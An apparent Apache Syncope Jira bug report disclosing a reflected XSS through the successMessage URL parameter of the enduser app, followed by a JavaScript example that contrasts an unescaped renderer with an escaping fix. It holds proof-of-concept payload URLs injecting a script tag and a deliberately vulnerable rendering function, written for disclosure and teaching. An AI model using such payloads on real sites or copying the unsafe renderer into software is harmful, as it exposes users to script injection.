songmingxuan created SYNCOPE-1516:
-------------------------------------
Summary: XSS vulnerability (successmessage field)
Key: SYNCOPE-1516
URL: https://issues.apache.org/jira/browse/SYNCOPE-1516
Project: Syncope
Issue Type: Bug
Components: enduser
Affects Versions: 2.1.5
Environment: ubuntu 5.0.0-36-generic #39~18.04.1-ubuntu
(syncope-standalone-2.1.5-distribution.zip)
Reporter: songmingxuan
Attachments: syncope_xss.docx
Here is how the XSS works, and the URLs:
——————————
http://*.*.*.*:9080/syncope-enduser/app/#!/self?successMessage=<script>alert(11)</script>
http://*.*.*.*:9080/syncope-enduser/?successMessage=<script>alert(11)</script>
——————————
See the attached document for details: syncope_xss.docx
--
This message was sent by Atlassian Jira
(v8.3.4#803005)
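The two URLs above differ only in where the `successMessage` parameter sits: in the plain query string, or inside the `#!/self?...` hash route of the single-page enduser app. The following is an added example, not code from the Jira report and not Syncope's own enduser code: it extracts the parameter from both URL shapes, then contrasts a simplified, hypothetical rendering function that reflects the value as raw HTML (the pattern that makes `<script>alert(11)</script>` execute) with one that HTML-escapes it first. The host `192.0.2.10` and the `renderUnsafe`/`renderSafe` helpers are constructed for illustration.

```javascript
// Added example (not from the Jira issue or the Syncope code base).
// Demonstrates reflected XSS through a URL parameter that is rendered as HTML.

// Extract successMessage from either URL shape seen in the report:
//   ...?successMessage=...            (plain query string)
//   ...#!/self?successMessage=...     (query carried inside the hash route)
function getSuccessMessage(urlString) {
  const u = new URL(urlString);
  // Plain query form. URL encodes < and > as %3C/%3E; searchParams decodes them again.
  const fromQuery = u.searchParams.get("successMessage");
  if (fromQuery !== null) return fromQuery;
  // Hash-routed form: everything after '#' is the fragment, so look for a '?' inside it.
  const qIdx = u.hash.indexOf("?");
  if (qIdx === -1) return null;
  return new URLSearchParams(u.hash.slice(qIdx + 1)).get("successMessage");
}

// Hypothetical vulnerable renderer: the untrusted value is concatenated straight into
// markup (the innerHTML-style pattern). Any tags in the value become live DOM.
function renderUnsafe(msg) {
  return `<div class="alert alert-success">${msg}</div>`;
}

// Minimal HTML entity escaping for text placed inside an element body or attribute.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened renderer: same markup, but the value is escaped so it can only ever be text.
function renderSafe(msg) {
  return `<div class="alert alert-success">${escapeHtml(msg)}</div>`;
}

// Detection helper: does the produced markup still contain an executable script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed inputs mirroring the report's URLs; the host is a placeholder.
const PAYLOAD_URLS = [
  "http://192.0.2.10:9080/syncope-enduser/app/#!/self?successMessage=<script>alert(11)</script>",
  "http://192.0.2.10:9080/syncope-enduser/?successMessage=<script>alert(11)</script>",
];

for (const url of PAYLOAD_URLS) {
  const msg = getSuccessMessage(url);
  console.log("parameter value :", msg);
  console.log("unsafe render   :", renderUnsafe(msg), "-> script tag:", containsScriptTag(renderUnsafe(msg)));
  console.log("safe render     :", renderSafe(msg), "-> script tag:", containsScriptTag(renderSafe(msg)));
}
```

The point of the contrast is that the fix is not in URL parsing (both forms decode to the same string) but at the sink: a success message coming from the URL must be rendered as text, never as markup.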